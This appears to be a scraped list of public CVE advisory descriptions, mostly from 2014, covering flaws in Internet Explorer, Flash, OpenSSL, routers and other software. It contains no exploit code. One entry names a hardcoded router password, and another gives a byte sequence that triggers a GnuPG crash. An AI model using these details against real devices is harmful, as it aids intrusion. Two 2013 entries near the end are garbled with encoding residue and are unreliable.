The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259
Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266
The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294
Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354
The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362
Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488
APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493
Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494
Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498
Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515
Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536
Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577
Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783
Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349
Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356
Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370
The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379
Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382
WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466
SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472
Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563
Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565
The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586
content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701
The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740
Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744
Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753
Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806
The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808
Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811
The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014
imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103
Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109
The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554
OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742
Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768
Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."
CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.
CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.
CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.
CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.
CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.
CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.
CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.
CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.
CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.
CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.
CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.
